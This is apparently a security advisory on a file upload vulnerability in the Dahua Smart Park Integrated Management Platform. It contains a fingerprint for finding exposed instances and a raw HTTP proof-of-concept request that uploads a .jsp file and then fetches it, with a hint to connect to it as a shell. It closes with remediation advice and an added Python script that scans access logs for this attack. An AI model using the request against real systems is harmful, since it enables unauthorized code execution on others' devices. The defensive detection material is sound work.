0x01 Product Introduction
"Dahua Smart Park Integrated Management Platform" is a comprehensive management platform with functions such as park operation, resource allocation, and intelligent services. The platform is intended to assist in optimizing the resource allocation of the park to meet diversified management needs, and at the same time enhance the user experience by providing intelligent services.
0x02 Vulnerability Overview
The Dahua Smart Park device exposes a file upload function but does not strictly restrict or filter the type, size, format, or path of uploaded files. An attacker can construct a malicious file, upload it to the device, and then use this vulnerability to gain privileges and execute arbitrary commands.
0x03 Reproduction Environment
Intergraph fingerprint: web.body="/WPMS/asset/lib/gridster/"
0x04 Vulnerability Reproduction
PoC
POST /publishing/publishing/material/file/video HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="a.jsp"

test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7--
Verify URL
http://your-ip/publishingImg/VIDEO/<returned file name>.jsp
upload
try to connect
0x05 Remediation Advice
Users of affected systems should apply patches as soon as possible, restrict access sources, and avoid exposing the Dahua Smart Park Integrated Management Platform to the public network or other insecure network environments.
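The requests in the reproduction section leave a recognizable trace in web access logs: a POST to the upload endpoint, then a request for a .jsp file under /publishingImg/VIDEO/. The following is an added example (not from the original post or from the vendor) that scans logs for that pattern. It assumes the combined log format, and the sample lines, IP addresses and file names are constructed.

```python
import re

# Paths taken from the request and verify URL on this page.
UPLOAD_PATH = "/publishing/publishing/material/file/video"
MEDIA_PREFIX = "/publishingImg/VIDEO/"
SCRIPT_EXT = re.compile(r"\.(jsp|jspx)$", re.IGNORECASE)

# Assumption: access logs use the common/combined log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample input (documentation IP ranges, made-up file names).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Aug/2023:10:00:01 +0800] "POST /publishing/publishing/material/file/video HTTP/1.1" 200 87
203.0.113.7 - - [01/Aug/2023:10:00:05 +0800] "GET /publishingImg/VIDEO/constructed_name.jsp HTTP/1.1" 200 4
198.51.100.9 - - [01/Aug/2023:10:02:00 +0800] "GET /publishingImg/VIDEO/intro.mp4 HTTP/1.1" 200 1048576
198.51.100.23 - - [01/Aug/2023:10:03:00 +0800] "GET /publishingImg/VIDEO/other.jsp HTTP/1.1" 404 0
"""

def scan(lines):
    """Return (severity, client_ip, timestamp, reason) for each suspicious request."""
    findings = []
    uploaders = set()  # clients with an accepted POST to the upload endpoint
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, ts, status = m["ip"], m["ts"], int(m["status"])
        # Drop query string and ";param" suffixes before matching the path.
        path = m["uri"].split("?", 1)[0].split(";", 1)[0]
        if m["method"] == "POST" and path == UPLOAD_PATH and status < 400:
            uploaders.add(ip)
            findings.append(("review", ip, ts, "upload to video material endpoint"))
        elif path.startswith(MEDIA_PREFIX) and SCRIPT_EXT.search(path):
            # A media directory should never serve server-side scripts.
            if status != 200:
                severity = "review"      # probe for a file that was not served
            elif ip in uploaders:
                severity = "critical"    # same client uploaded, then fetched a script
            else:
                severity = "high"        # script served from the media directory
            findings.append((severity, ip, ts, f"script in media dir: {path} -> {status}"))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(*finding, sep=" | ")
```

Any "high" or "critical" finding means a script file was served from the media directory, so the host should be treated as compromised and the upload directory inspected for .jsp files.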